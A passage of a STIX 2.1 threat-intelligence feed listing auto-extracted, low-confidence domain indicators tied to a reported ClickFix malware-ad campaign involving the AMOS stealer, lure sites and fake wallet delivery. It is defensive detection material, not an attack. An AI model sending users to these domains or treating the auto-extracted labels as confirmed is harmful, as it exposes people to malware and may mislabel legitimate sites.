houstongaragedoorinstallers[.]com; pressureulcerlawyer[.]com; lalandscapelighting[.]com; ai","pattern":"[domain-name:value = 'houstongaragedoorinstallers.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d531c87a-7453-426f-ab74-c10976cd0e90","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: lakhov.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: me[.]com; node-slate[.]com; grove-12[.]com; verse-18[.]com; lakhov[.]com; mpasvw[.]com; ouilov[.]com; aforvm[.]com AMOS helper and","pattern":"[domain-name:value = 'lakhov.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--946d65c4-3e49-42ab-abd8-522144dacd5f","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: lalandscapelighting.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: ustongaragedoorinstallers[.]com; pressureulcerlawyer[.]com; lalandscapelighting[.]com; aidevmaster[.]com; pinescope11[.]com; dogtrainersgeorgia","pattern":"[domain-name:value = 'lalandscapelighting.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--414c57bc-b3d8-465a-bcb8-2d77dff4928e","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: leaf68.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: trefoils[.]com Click-tracking domains Domain press29[.]com; leaf68[.]com; basequill9[.]com; perchframe15[.]com; canvas-35[.]com; p","pattern":"[domain-name:value = 'leaf68.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--a535b11e-efe7-4a6b-a611-426469e1f466","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: loop-lumen.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: [.]com; aforvm[.]com AMOS helper and tasking domains Domain loop-lumen[.]com; umapla[.]com; glrack[.]com Fake wallet delivery domains","pattern":"[domain-name:value = 'loop-lumen.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--2a771e01-4c90-4bdb-be51-af46a319a471","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: macdeveloperhub.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: s-route domains Domain crisp-paths[.]com; cli-guides[.]com; macdeveloperhub[.]com; macfixguide[.]com; claud-tips[.]com; codex-paths[.]com;","pattern":"[domain-name:value = 'macdeveloperhub.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d3d85ff0-8824-4818-b940-25bab954cec9","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: macfixguide.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: crisp-paths[.]com; cli-guides[.]com; macdeveloperhub[.]com; macfixguide[.]com; claud-tips[.]com; codex-paths[.]com; cmux-lab[.]com; rec","pattern":"[domain-name:value = 'macfixguide.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--5ccf8798-a238-4a7c-8751-469e7c228a75","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: macstoragetips.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: va-tools[.]top; novastacktips[.]com; remotion-skills[.]com; macstoragetips[.]com Provisioning-neighborhood domains Domain chatgpt-safepage","pattern":"[domain-name:value = 'macstoragetips.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--4160d342-6719-4d23-8cfb-96ee50678a62","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: marbellaresales.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: heater[.]com; restoremental[.]com; glowmedaesthetics[.]com; marbellaresales[.]com; gatemaden[.]space; beaocnagent[.]com; hbubagent[.]com Ma","pattern":"[domain-name:value = 'marbellaresales.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--a684477e-31b2-4205-9fc4-b14b5b791b07","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: microsoftupdater.info","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: page[.]com; thepullmanfolkestone[.]com; gigappyworld[.]com; microsoftupdater[.]info; gogolfonline[.]com; heroestales[.]com; wantsellonline[.]","pattern":"[domain-name:value = 'microsoftupdater.info']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--1116fa36-2cc2-4327-a3fe-0ef9bc9d24b3","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: mpasvw.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: -slate[.]com; grove-12[.]com; verse-18[.]com; lakhov[.]com; mpasvw[.]com; ouilov[.]com; aforvm[.]com AMOS helper and tasking domai","pattern":"[domain-name:value = 'mpasvw.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--85025dc7-bd1d-482b-9074-68d20dc7de3e","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: muse-code-ide.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: ]com; codex-paths[.]com; cmux-lab[.]com; rectangleap[.]com; muse-code-ide[.]com; hbomaxx[.]app; codex-craft[.]com; code-desktop[.]com; cl","pattern":"[domain-name:value = 'muse-code-ide.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--855d1053-7ec8-402e-ab81-12cf64a7fe2e","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: node-slate.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: ins Domain arkypc[.]com; harbor-29[.]com; fern-plume[.]com; node-slate[.]com; grove-12[.]com; verse-18[.]com; lakhov[.]com; mpasvw[.]c","pattern":"[domain-name:value = 'node-slate.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--228e8ddd-ee05-4cd6-802f-b96d5835f3d4","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: nova-desk.top","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: -linked lure domains Domain applediag[.]com; getnova[.]top; nova-desk[.]top; nova-fix[.]top; nova-hub[.]top; nova-labs[.]top; nova-to","pattern":"[domain-name:value = 'nova-desk.top']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--508f0395-6e21-4b78-8c30-c319226a2eca","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: nova-fix.top","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: ins Domain applediag[.]com; getnova[.]top; nova-desk[.]top; nova-fix[.]top; nova-hub[.]top; nova-labs[.]top; nova-tools[.]top; novas","pattern":"[domain-name:value = 'nova-fix.top']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--73f8f869-807d-4cee-b894-59a83a8fdfef","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: nova-hub.top","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: diag[.]com; getnova[.]top; nova-desk[.]top; nova-fix[.]top; nova-hub[.]top; nova-labs[.]top; nova-tools[.]top; novastacktips[.]com;","pattern":"[domain-name:value = 'nova-hub.top']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--55b09baa-3987-4008-8111-7fad635f23ba","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: nova-labs.top","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: ova[.]top; nova-desk[.]top; nova-fix[.]top; nova-hub[.]top; nova-labs[.]top; nova-tools[.]top; novastacktips[.]com; remotion-skills[.","pattern":"[domain-name:value = 'nova-labs.top']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--b1f7829c-0118-4dc8-8ce6-9cc034824bdb","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: novastacktips.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: x[.]top; nova-hub[.]top; nova-labs[.]top; nova-tools[.]top; novastacktips[.]com; remotion-skills[.]com; macstoragetips[.]com Provisioning","pattern":"[domain-name:value = 'novastacktips.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--b64b0808-0110-4b6a-a5fe-8913b9a82184","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: nova-tools.top","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: esk[.]top; nova-fix[.]top; nova-hub[.]top; nova-labs[.]top; nova-tools[.]top; novastacktips[.]com; remotion-skills[.]com; macstorageti","pattern":"[domain-name:value = 'nova-tools.top']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--9887ee3f-c74f-4b13-a79b-5ebb097d7ad5","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: oakenfjrod.ru","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: Fake wallet delivery domains Domain desktop-version[.]com; oakenfjrod[.]ru Windows staging domains Domain sic180[.]com; habar55[.]na","pattern":"[domain-name:value = 'oakenfjrod.ru']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--7f79566a-f87b-4727-a65a-a444de669edd","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: opendisplay.us","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: -desktop[.]com; claude-tools[.]com; clean-disk-tools[.]com; opendisplay[.]us Provisioning-linked lure domains Domain applediag[.]com;","pattern":"[domain-name:value = 'opendisplay.us']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--e6d31e0d-4faa-4a8a-8ab9-c284e3085f82","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: ouilov.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: grove-12[.]com; verse-18[.]com; lakhov[.]com; mpasvw[.]com; ouilov[.]com; aforvm[.]com AMOS helper and tasking domains Domain loop","pattern":"[domain-name:value = 'ouilov.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--b9f23a56-815b-4776-a6ed-b97c21640b8f","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: papartybus.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: ogolfonline[.]com; heroestales[.]com; wantsellonline[.]com; papartybus[.]com; clveeragent[.]com; congiagent[.]com; sgaaagent[.]com; sp","pattern":"[domain-name:value = 'papartybus.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--3ef47e1f-7951-45b4-8384-04b4d34712a3","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: perchframe15.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: mains Domain press29[.]com; leaf68[.]com; basequill9[.]com; perchframe15[.]com; canvas-35[.]com; pine63[.]com; trekmesh15[.]com macOS lo","pattern":"[domain-name:value = 'perchframe15.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--1dc70587-f79d-4e9b-86aa-047ec5c07d96","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: pine63.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: com; basequill9[.]com; perchframe15[.]com; canvas-35[.]com; pine63[.]com; trekmesh15[.]com macOS loader-delivery domains Domain we","pattern":"[domain-name:value = 'pine63.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--a4b08701-ccc4-4231-8356-5233870452e4","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: pinescope11.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: lawyer[.]com; lalandscapelighting[.]com; aidevmaster[.]com; pinescope11[.]com; dogtrainersgeorgia[.]com; denverplumbingandwaterheater[.","pattern":"[domain-name:value = 'pinescope11.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--73bb846e-d5d4-45dc-8384-5156a5f41406","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: press29.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: m; camaligsalvatrefoils[.]com Click-tracking domains Domain press29[.]com; leaf68[.]com; basequill9[.]com; perchframe15[.]com; canv","pattern":"[domain-name:value = 'press29.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--66e08e37-fbe8-404a-9ae3-6079128d521c","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: pressureulcerlawyer.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: delivery domains Domain houstongaragedoorinstallers[.]com; pressureulcerlawyer[.]com; lalandscapelighting[.]com; aidevmaster[.]com; pinescope1","pattern":"[domain-name:value = 'pressureulcerlawyer.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--7a0d378c-2e4a-4eb3-9283-116f8ba02429","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: rectangleap.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: .]com; claud-tips[.]com; codex-paths[.]com; cmux-lab[.]com; rectangleap[.]com; muse-code-ide[.]com; hbomaxx[.]app; codex-craft[.]com; c","pattern":"[domain-name:value = 'rectangleap.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--2d40f9fd-e94d-46ef-b9ab-4bf9b4c314e7","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: remotion-skills.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: op; nova-labs[.]top; nova-tools[.]top; novastacktips[.]com; remotion-skills[.]com; macstoragetips[.]com Provisioning-neighborhood domains D","pattern":"[domain-name:value = 'remotion-skills.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--2c8eca63-20d5-4053-96ca-e77df4939cd9","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: restoremental.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: gtrainersgeorgia[.]com; denverplumbingandwaterheater[.]com; restoremental[.]com; glowmedaesthetics[.]com; marbellaresales[.]com; gatemade","pattern":"[domain-name:value = 'restoremental.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d785f73c-3ca9-4c06-9c45-72995fe24020","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: rudder-moss.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: ivery domains Domain weaveridge7[.]com; ember-bridge[.]com; rudder-moss[.]com; wuess[.]com September macOS telemetry and delivery domai","pattern":"[domain-name:value = 'rudder-moss.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--22a2446f-e45a-45a7-af99-0837b677630f","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: sgaaagent.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: com; papartybus[.]com; clveeragent[.]com; congiagent[.]com; sgaaagent[.]com; sprieagent[.]com; cosimcagent[.]com; cehamilton[.]com; b","pattern":"[domain-name:value = 'sgaaagent.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--5a4a0981-a201-417e-8167-f8865eab6e98","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: sic180.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: rsion[.]com; oakenfjrod[.]ru Windows staging domains Domain sic180[.]com; habar55[.]namebright[.]bike SIC Windows-route domains Do","pattern":"[domain-name:value = 'sic180.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--c6aa0b4c-c996-4211-978e-3564cc09f69b","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: sprieagent.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: ]com; clveeragent[.]com; congiagent[.]com; sgaaagent[.]com; sprieagent[.]com; cosimcagent[.]com; cehamilton[.]com; broadwalkindia[.]co","pattern":"[domain-name:value = 'sprieagent.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--f1ff3642-6ce3-4e5a-8b55-b62199d45861","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: storageprofiler.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: le activity IP address 172.236.51[.]169 Origin observed for storageprofiler[.]com gated lure IP address 138.124.93[.]32 AMOS helper /contac","pattern":"[domain-name:value = 'storageprofiler.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--01b30ae2-6a7c-4c34-86b5-e651bfa096ed","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: thepullmanfolkestone.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: sioning-neighborhood domains Domain chatgpt-safepage[.]com; thepullmanfolkestone[.]com; gigappyworld[.]com; microsoftupdater[.]info; gogolfonlin","pattern":"[domain-name:value = 'thepullmanfolkestone.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security 